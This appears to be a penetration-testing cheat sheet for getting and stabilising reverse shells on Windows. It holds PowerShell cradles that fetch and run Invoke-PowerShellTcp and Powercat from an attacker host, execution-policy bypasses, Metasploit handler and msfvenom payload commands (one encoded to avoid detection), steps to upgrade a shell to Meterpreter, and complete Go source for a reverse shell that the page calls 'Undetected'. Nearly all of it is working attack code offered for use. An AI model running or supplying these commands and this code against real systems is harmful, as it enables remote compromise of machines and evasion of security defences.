Skip to main content

Stabilization

:: In Windows we can use rlwrap before Connecting to the Target Machine
rlwrap nc -nvlp <PORT>

CMD - PSH

Invoke-PowerShellTcp  Powercat

# [Invoke-PowerShellTcp] Download - Execute 
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');" "Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"

# [Powercat] Download - Execute 
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Powercat.ps1');" "Powercat -c IP -p PORT -e cmd"
:: [Invoke-PowerShellTcp] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"

:: [Powercat] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Powercat.ps1;Powercat -c IP -p PORT -e cmd"

Interface

:: Enable Unicode Characters
chcp 65001

:: Set Keyboard Layout
Set-WinUserLanguageList -LanguageList us-US -force

Metasploit

:: Catching a Reverse Shell
:: Load the Module
use exploit/multi/handler

:: Parameters
set LHOST
set LPORT

:: Set the Correct PAYLOAD
set PAYLOAD windows/shell/reverse_tcp

PAYLOADS

:: Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

:: Reverse TCP
msfvenom -p windows/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

:: Reverse TCP Encoded
msfvenom -p windows/shell/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

Upgrading To Meterpreter

It May Be Necessary To Run The Commands Multiple Times Before Succeeding 
:: Background the SHELL: [CTRL+Z]
:: Provide the Session Number
sessions -u SESSION
:: Background the SHELL: [CTRL+Z]
:: Load the Module
use multi/manage/shell_to_meterpreter

:: Provide the Session Number
:: [Method 1]
run session=SESSION 

:: [Method 2]
run session=SESSION win_transfer=POWERSHELL

:: [Method 3]
run session=SESSION win_transfer=VBS

GO Reverse Shell

Features Missing

Mostly Stable and Undetected. Works on Windows - Linux.


:: Build
:: This is going to Generate a Binary Named [GoRevShell.exe]
env GOOS=windows GOARCH=386 go build GoRevShell.go

:: Usage
GoRevShell.exe -i <IP> -p <PORT>

:: Catching The Shell
rlwrap nc -nvlp <PORT>
SOURCE

package main

import (
    "bufio"
    "flag"
    "fmt"
    "net"
    "os"
    "os/exec"
    "runtime"
)

func execute(msg string) (string, []string) {
    var exe string
    os := runtime.GOOS

    if os == "windows" {
        exe = "cmd"
    } else if os == "linux" {
        exe = "/bin/bash"
    } else {
        fmt.Println("Unknown Arch. Terminating.")
    }

    args := []string{}
    if exe == "cmd" {
        args = append(args, "/C")
    } else {
        args = append(args, "-c")
    }

    args = append(args, msg)
    return exe, args
}

func main() {
    args := os.Args
    if len(args) < 2 {
        fmt.Println("Usage: [OPTIONS]\n\n GO Reverse Shell\n\nOptions:\n -i HOST -p PORT")
        return
    }

    I_P := flag.String("i", "", "HOST")
    L_PORT := flag.String("p", "", "PORT")
    flag.Parse()

    conn, _ := net.Dial("tcp", fmt.Sprintf("%s:%s", *I_P, *L_PORT))
    for {
        cwd, _ := os.Getwd()
        fmt.Fprintf(conn, "\n%s> ", cwd)
        msg, _ := bufio.NewReader(conn).ReadString('\n')
        exe, args := execute(msg)
        out, err := exec.Command(exe, args...).Output()
        if err != nil {
            fmt.Println(conn, "\n\n%s\n", err)
        }
        fmt.Fprintf(conn, "%s", out)
    }
}